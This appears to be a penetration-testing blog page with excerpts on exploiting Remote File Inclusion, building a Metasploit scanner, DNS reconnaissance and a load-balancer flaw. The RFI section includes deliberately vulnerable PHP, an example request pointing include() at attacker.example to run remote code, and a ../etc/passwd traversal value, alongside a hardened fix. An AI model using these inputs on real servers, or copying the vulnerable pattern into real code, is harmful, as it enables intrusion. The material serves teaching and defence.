From RFI to Shell

Remote File Inclusion (RFI) is a web application vulnerability that lets an attacker run code of their choosing on the server. It occurs when untrusted input (typically a request parameter) is passed to an include-style call; if the runtime is configured to allow URL includes, the attacker can point that call at a file hosted on a server they control, and the web application fetches and executes it. In this post, I'll describe how to exploit RFI to get a reverse shell on the target using two methods. The first uses only tools already present on the victim, while the second uses the more feature-rich Metasploit approach.
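To make the flaw concrete, here is an added illustration (not code from the original post): a minimal PHP page with an RFI bug, the php.ini setting that makes it remotely exploitable, and a hardened rewrite that maps the parameter to a fixed allowlist instead of passing it to include(). The ./pages/ layout, the page names and the attacker hostname are assumptions made for the example.

```php
<?php
// Added illustration, not code from the original post.
// Assumed layout: templates live in ./pages/ as home.php, about.php, contact.php.

// --- Vulnerable: the request parameter reaches include() unchanged. ---------
// With allow_url_include=On (which also requires allow_url_fopen=On) in php.ini,
// a request such as  ?page=http://attacker.example/payload.txt  makes PHP fetch
// and execute the remote file. With URL includes disabled, the same code is
// still a local file inclusion bug (?page=../../../../etc/passwd).
function render_page_vulnerable(): void
{
    $page = $_GET['page'] ?? 'home';
    include $page;                       // attacker controls the path or URL
}

// --- Hardened: never hand user input to include(); look it up instead. ------
// The allowlist is the control: an unknown key yields null, so no path, URL,
// traversal sequence or stream wrapper can ever reach include().
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;    // exact-key lookup, nothing else
}

function render_page_hardened(): void
{
    // ?page[]=x would arrive as an array; treat anything but a string as the default.
    $requested = $_GET['page'] ?? 'home';
    if (!is_string($requested)) {
        $requested = 'home';
    }

    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

render_page_hardened();

// Defence in depth, independent of the code above (php.ini):
//   allow_url_include = Off          ; no http://, ftp:// or data: targets in include/require
//   allow_url_fopen   = Off          ; if the app never needs remote fopen()/file_get_contents()
//   open_basedir      = /var/www/app ; confines file access to the application tree
```

Two caveats worth remembering when testing: disabling allow_url_include removes the remote vector but not the underlying bug, so the vulnerable function remains a local file inclusion issue, and the php://filter wrapper (useful for reading source) is not governed by that setting. Only the allowlist fix removes the class of problem.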


How To Create a Metasploit Module

Today I want to review how to create a Metasploit module. This process was entirely new to me, so I decided to start from scratch, using the Metasploit Unleashed site as a guide. My aim was to create an auxiliary scanner to look for Dropbox listeners running on the default ports of TCP/17500 and UDP/17500. I use Kali Linux, so all of my examples reflect that environment.


DNS Recon

The Domain Name System is crucial for human interaction with networks. Gathering information about a target is critical to performing a successful penetration test, and the DNS service is one of the key sources of this information. Today, I want to write about the different types of information that can be discovered by probing this service using a mix of command line tools and web resources. There are many tools available to interact with DNS, but today I'm going to cover the use of nslookup, host, and dig on the command line, and the Netcraft website.


Load Balancer Fail

On a recent engagement, I discovered a serious flaw in the assumptions made during the implementation of a web application. The application in question manages user password recovery and is hosted on IIS on Windows. The deployment I evaluated used load balancing to handle the volume of user requests per hour. The application can hook into Active Directory authentication to control user access to the various administrative functions it provides.
